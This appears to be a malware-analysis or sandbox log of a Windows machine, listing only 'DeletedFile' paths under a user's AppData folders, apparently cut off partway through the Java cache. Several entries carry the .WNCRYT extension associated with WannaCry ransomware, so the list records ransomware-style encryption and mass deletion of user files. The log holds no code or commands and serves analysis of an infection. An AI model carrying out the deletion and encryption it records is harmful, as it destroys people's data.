DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\fil-ph\~SDF341.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\fr\~SDF361.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ga-ie\~SDF362.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\gd\~SDF363.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\gd-latn\~SDF364.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\gl\~SDF365.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\gu\~SDF366.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ha-latn-ng\~SDF377.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\he\~SDF3B6.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\hi\~SDF3F6.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\hr\~SDF407.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\hu\~SDF446.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\hy\~SDF495.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\id\~SDF4C5.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ig-ng\~SDF533.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\imageformats\~SDF5B1.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\~SDF63F.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\is\~SDF68E.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\it\~SDF6DD.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ja\~SDF70D.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ka\~SDF75C.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\kk\~SDF79C.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\km-kh\~SDF7DB.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\kn\~SDF82A.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ko\~SDF86A.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\kok\~SDF8A9.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ku-arab\~SDF8D9.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ky\~SDF8FA.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\lb-lu\~SDF939.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\lt\~SDF979.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\lv\~SDF9A8.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\mi-nz\~SDF9D8.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\mk\~SDFA37.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ml-in\~SDFA67.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\mn\~SDFA97.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\mr\~SDFAC7.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ms\~SDFAF7.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\mt-mt\~SDFB26.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\nb-no\~SDFB56.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ne-np\~SDFB86.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\nl\~SDFBB6.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\nn-no\~SDFBC7.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\nso-za\~SDFBE7.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\or-in\~SDFC36.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\pa\~SDFC66.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\pa-arab\~SDFCB5.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\pa-arab-pk\~SDFCC6.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\pl\~SDFCE6.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\platforms\~SDFCE7.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\prs-af\~SDFCE8.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\pt-br\~SDFCE9.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\pt-pt\~SDFD28.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\~SDFD68.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick\~SDFD88.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick\Controls\~SDFDE7.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick\Controls\Styles\~SDFE36.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick\Controls\Styles\Flat\~SDFE85.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick\Controls.2\~SDFEC5.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick\Extras\~SDFF14.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick\Layouts\~SDFF73.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick\Templates.2\~SD10.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick\Window.2\~SD30.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick.2\~SD50.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qut-latn\~SD9F.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\quz-pe\~SDCF.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ro\~SD10F.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ru\~SD11F.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\rw\~SD16F.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\scenegraph\~SD1CD.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sd-arab\~SD1FD.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sd-arab-pk\~SD23D.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\si-lk\~SD27C.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sk\~SD28D.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sl\~SD28E.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sq\~SD28F.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sr-cyrl-ba\~SD290.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sr-cyrl-rs\~SD291.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sr-latn-rs\~SD2FF.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sv\~SD36E.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sw\~SD3BD.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ta\~SD3FC.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\te\~SD47A.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\tg\~SD49A.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\tg-cyrl\~SD4CA.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\th\~SD558.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ti\~SD5C6.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\tk-tm\~SD615.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\tn-za\~SD645.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\tr\~SD6A4.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\tt\~SD6F3.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ug\~SD713.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ug-arab\~SD743.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\uk\~SD764.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ur\~SD7A3.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\uz-latn-uz\~SD7E3.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\vi\~SD7F3.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\wo\~SD813.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\xh-za\~SD814.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\yo-ng\~SD854.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\zh-cn\~SD874.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\zh-tw\~SD885.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\zu-za\~SD8A5.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\~SD8B6.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\~SD914.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\PlayReady\~SD944.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\RMSLocalStorage\~SD974.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\TaskSchedulerConfig\~SD994.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Vault\~SD9C4.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\~SD9C5.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\~SD9C6.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\1024\~SD9C7.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\1033\~SD9C8.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\AppCache\~SD9C9.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\AppCache\7AI636VW\~SD9CA.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Burn\~SD9DB.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Burn\Burn\~SD9DC.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\~SD9DD.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\~SD9DE.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\GameExplorer\~SD9DF.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\History\~SD9E0.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\History\History.IE5\~SD9E1.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012024080520240806\~SD9F2.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\History\Low\~SD9F3.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\~SD9F4.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ISE\~SD9F5.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ISE\S-1-5-5-0-122291\~SD9F6.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Ringtones\~SD9F7.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\SipNotify\~SD9F8.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\SipNotify\eoscontent\~SDA18.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\SipNotify\eoscontent\main.jpg.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Themes\~SDA77.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\~SDA87.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\WER\~SDAC7.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\WER\ERC\~SDAF7.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportArchive\~SDB26.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportQueue\~SDB37.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportQueue\NonCritical_x64_3eb5ea8473594499407cacbd9887e2953d50fd80_cab_0a5884df\~SDB57.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportQueue\NonCritical_x64_5f6630b0297fd4d8402560a938657f1364116_cab_012098e4\~SDB68.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportQueue\NonCritical_x64_7e7688eac2ab845272f4daac96479e93e0f0a5_cab_0ad8a2e7\~SDB88.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportQueue\NonCritical_x64_d0c641ef89a8d207056286596bafe75f59844_cab_0a108ee2\~SDBB8.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows Live\~SDBD8.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows Live\Bici\~SDBD9.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows Mail\~SDBEA.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\~SDBEB.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new\~SDC3A.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\~SDC7A.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.jpg.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.jpg.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\GreenBubbles.jpg.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\HandPrints.jpg.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\OrangeCircles.jpg.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.jpg.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.jpg.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\ShadesOfBlue.jpg.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\SoftBlue.jpg.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.jpg.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows Media\~SDEFB.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows Media\12.0\~SDEFC.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows Sidebar\~SDF6B.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows Sidebar\Gadgets\~SDF7B.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft_Corporation\~SDF9B.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\~SDFCB.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\~SDFFB.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveFiles\~SD102B.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\~SD106B.tmp
DeletedFile: C:\Users\user\AppData\Local\Mozilla\~SD108B.tmp
DeletedFile: C:\Users\user\AppData\Local\Mozilla\Firefox\~SD10DA.tmp
DeletedFile: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\~SD10DB.tmp
DeletedFile: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\~SD10DC.tmp
DeletedFile: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\cache2\~SD10ED.tmp
DeletedFile: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\cache2\doomed\~SD114B.tmp
DeletedFile: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\cache2\entries\~SD117B.tmp
DeletedFile: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\safebrowsing\~SD11DA.tmp
DeletedFile: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\safebrowsing\google4\~SD1239.tmp
DeletedFile: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\startupCache\~SD123A.tmp
DeletedFile: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\thumbnails\~SD1279.tmp
DeletedFile: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\yivbg7nf.default\~SD1299.tmp
DeletedFile: C:\Users\user\AppData\Local\Package Cache\~SD12BA.tmp
DeletedFile: C:\Users\user\AppData\Local\Package Cache\{85379532-0003-4517-8fc4-6227b410c30c}\~SD12EA.tmp
DeletedFile: C:\Users\user\AppData\Local\pip\~SD130A.tmp
DeletedFile: C:\Users\user\AppData\Local\pip\cache\~SD1359.tmp
DeletedFile: C:\Users\user\AppData\Local\pip\cache\http\~SD136A.tmp
DeletedFile: C:\Users\user\AppData\Local\pip\cache\http\4\~SD1399.tmp
DeletedFile: C:\Users\user\AppData\Local\pip\cache\http\4\e\~SD13D9.tmp
DeletedFile: C:\Users\user\AppData\Local\pip\cache\http\4\e\e\~SD1428.tmp
DeletedFile: C:\Users\user\AppData\Local\pip\cache\http\4\e\e\3\~SD1448.tmp
DeletedFile: C:\Users\user\AppData\Local\pip\cache\http\4\e\e\3\1\~SD14A7.tmp
DeletedFile: C:\Users\user\AppData\Local\pip\cache\http\8\~SD14D7.tmp
DeletedFile: C:\Users\user\AppData\Local\pip\cache\http\8\8\~SD14F7.tmp
DeletedFile: C:\Users\user\AppData\Local\pip\cache\http\8\8\6\~SD1517.tmp
DeletedFile: C:\Users\user\AppData\Local\pip\cache\http\8\8\6\e\~SD1528.tmp
DeletedFile: C:\Users\user\AppData\Local\pip\cache\http\8\8\6\e\e\~SD1539.tmp
DeletedFile: C:\Users\user\AppData\Local\pip\cache\http\a\~SD1578.tmp
DeletedFile: C:\Users\user\AppData\Local\pip\cache\http\a\1\~SD1598.tmp
DeletedFile: C:\Users\user\AppData\Local\pip\cache\http\a\1\9\~SD15B9.tmp
DeletedFile: C:\Users\user\AppData\Local\pip\cache\http\a\1\9\5\~SD15C9.tmp
DeletedFile: C:\Users\user\AppData\Local\pip\cache\http\a\1\9\5\3\~SD15EA.tmp
DeletedFile: C:\Users\user\AppData\Local\pip\cache\selfcheck\~SD160A.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\~SD163A.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Adobe\~SD165A.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Adobe\Acrobat\~SD1699.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\~SD16F8.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Adobe\Linguistics\~SD1747.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Microsoft\~SD17A6.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\~SD17E6.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\~SD1883.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\~SD1910.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Microsoft\Internet Explorer\~SD19BD.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Microsoft\Internet Explorer\Services\~SD19DE.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Microsoft\RMSLocalStorage\~SD1A0D.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Mozilla\~SD1A2E.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\~SD1A7D.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\~SD1A9D.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\~SD1ABD.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\~SD1AED.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\~SD1B6B.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\0\~SD1BBA.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\1\~SD1BDB.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\10\~SD1C39.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\11\~SD1C79.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\12\~SD1CD8.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\13\~SD1CF8.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\14\~SD1D37.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\15\~SD1D67.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\16\~SD1DB6.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\17\~SD1DE6.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\18\~SD1DF7.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\19\~SD1E17.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\2\~SD1E37.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\20\~SD1E67.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\21\~SD1E87.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\22\~SD1ED7.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\23\~SD1EE7.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\24\~SD1F07.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\25\~SD1F28.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\26\~SD1F77.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\27\~SD1FA7.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\28\~SD1FE6.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\29\~SD2035.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\3\~SD2065.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\30\~SD2095.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\31\~SD20B5.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\32\~SD20E5.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\33\~SD2144.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\34\~SD2155.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\35\~SD2175.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\36\~SD21B4.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\37\~SD21E4.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\38\~SD21F5.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\39\~SD2234.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\4\~SD2264.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\40\~SD2284.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\41\~SD2295.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\42\~SD2296.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\43\~SD22E5.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\44\~SD22F6.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\45\~SD2316.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\46\~SD2356.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\47\~SD2376.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\48\~SD2396.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\49\~SD23C6.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\5\~SD2425.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\50\~SD2435.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\51\~SD2456.tmp
